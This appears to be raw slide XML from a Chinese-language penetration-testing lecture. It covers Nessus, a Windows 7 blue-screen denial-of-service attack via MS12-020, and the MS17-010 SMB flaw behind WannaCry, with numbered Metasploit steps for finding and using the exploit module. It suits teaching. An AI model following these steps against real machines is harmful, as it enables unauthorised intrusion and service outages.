              </a:rPr>
              <a:t>Nessus: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/bin/systemctl start nessusd.service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB44A663-E66D-DCEF-3568-315A9E59AFC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270070" y="1153617"/>
            <a:ext cx="11176664" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>win7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>蓝屏：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ms12-020</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E463EEA1-FE34-284A-1A8C-36839F7BC663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="987378" y="3027861"/>
            <a:ext cx="9802758" cy="3765047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="737091536"/>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16149CD-CC9A-E4A1-CD37-88EB873C6F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270070" y="1153617"/>
            <a:ext cx="11176664" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>win7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>蓝屏：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ms12-020</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C63665A-B684-2A82-6F48-52C6D058F3F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2829731" y="1897553"/>
            <a:ext cx="8853002" cy="4718547"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A04E6F6-D3B9-CA1F-4F08-3876C2ED1F92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3684536" y="241900"/>
            <a:ext cx="8318278" cy="931866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C72C0F1A-006A-9FCD-051E-D25F2E7A233A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270070" y="2749729"/>
            <a:ext cx="2431089" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ms12-020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>辅助模块漏洞，进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>模块的漏洞不需要设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39508953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12872B9-AE9E-984D-8198-14737FEAC041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE982853-846E-F7D6-AC77-74D39F0C1491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542033" y="2261385"/>
            <a:ext cx="10844126" cy="4094967"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     ms17_010 是一种操作系统漏洞，仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统，并执行任意代码。这个漏洞通过 445 文件共享端口进行利用，一旦攻击者成功利用该漏洞，就可以在目标主机上植入各种恶意软件，如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码，将目标系统中的所有文件加密并威胁用户付款。由于该漏洞易受攻击，且已经公开和广泛利用，因此建议 Windows 系统用户及时进行安全更新以避免被攻击。对于其渗透测试相关应用，可以使用 Metasploit 和其他渗透测试框架进行利用和测试。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{300E8EBD-6C3A-A9CE-C2EA-AFE59DFDD479}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="172994" y="947495"/>
            <a:ext cx="10972800" cy="109360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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞实施攻击（略）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28075108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BEFC850-583C-6F12-5CC8-7BFEF1CD2362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73834F67-076E-83CF-053A-DF0532EE44C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599176" y="1879384"/>
            <a:ext cx="10308624" cy="4602798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1. service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> start //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>初始化数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>搜索对应的模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MS17-010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用相应的模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
